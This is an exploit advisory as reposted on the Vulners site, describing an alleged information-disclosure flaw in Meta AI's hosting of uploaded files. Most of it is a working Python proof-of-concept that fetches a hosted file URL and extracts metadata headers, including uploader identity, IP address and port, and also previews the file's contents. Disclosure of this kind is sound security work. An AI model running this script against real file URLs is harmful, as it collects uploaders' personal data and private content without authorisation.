Vulners
Lucene search
📄 Meta AI Information Disclosure
==================================================================================================================================
| # Title : Meta AI Disclosing sensitive metadata through hosting uploaded files |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.meta.ai/ |
==================================================================================================================================
[+] Summary : Publicly accessible hosted files generated through the upload workflow expose unsanitized object metadata through response headers.
The exposed metadata contains uploader-associated information including public IP addresses and additional internal object properties.
The issue allows anyone with access to the hosted URL to retrieve sensitive metadata without authentication.
[+] POC :
#!/usr/bin/env python3
import requests
import json
import argparse
from urllib.parse import urlparse
INTERESTING_HEADERS = [
"content-type",
"etag",
"cache-control",
"x-manifold-obj-blobsizebytes",
"x-manifold-obj-canonicalpath",
"x-manifold-obj-ctime",
"x-manifold-obj-propertiesjson",
]
MAX_PREVIEW = 5000
def analyze(url):
print(f"\n[+] Target: {url}")
try:
r = requests.get(
url,
allow_redirects=True,
timeout=20,
headers={
"User-Agent": "Metadata-Analyzer/3.0"
}
)
except Exception as e:
print("[-] Request failed:", e)
return
print("\n=== Response ===")
print("Status :", r.status_code)
print("Host :", urlparse(r.url).netloc)
print("\n=== Interesting Headers ===")
for h in INTERESTING_HEADERS:
value = r.headers.get(h)
if value:
print(f"{h}: {value}")
props = r.headers.get(
"x-manifold-obj-propertiesjson"
)
parsed = {}
if props:
try:
parsed = json.loads(props)
except Exception:
pass
if parsed:
print("\n=== Parsed Metadata ===")
for key in [
"file_name",
"owner",
"uploaded_by",
"ip_address",
"port_number",
"X-Manifold-Obj-ContentType"
]:
if key in parsed:
print(f"{key}: {parsed[key]}")
content_type = (
r.headers.get("content-type", "")
.lower()
.split(";")[0]
.strip()
)
print("\n=== Content Analysis ===")
print("Detected Content-Type:", content_type)
print("Body Length:", len(r.content), "bytes")
if (
content_type.startswith("text/")
or content_type in [
"application/json",
"application/xml"
]
):
print("\n=== File Content Preview ===")
try:
text = r.text
if len(text) > MAX_PREVIEW:
print(
text[:MAX_PREVIEW]
)
print(
f"\n[truncated at {MAX_PREVIEW} chars]"
)
else:
print(text)
except UnicodeDecodeError:
try:
print(
r.content.decode(
"utf-8",
errors="replace"
)[:MAX_PREVIEW]
)
except Exception as e:
print(
"Decode error:",
e
)
else:
print(
"[i] Non-text content, preview skipped"
)
print("\n[+] Done")
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"url",
help="CDN object URL"
)
args = parser.parse_args()
analyze(args.url)
if __name__ == "__main__":
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Jun 2026 00:00Current
5.5Medium risk
Vulners AI Score5.5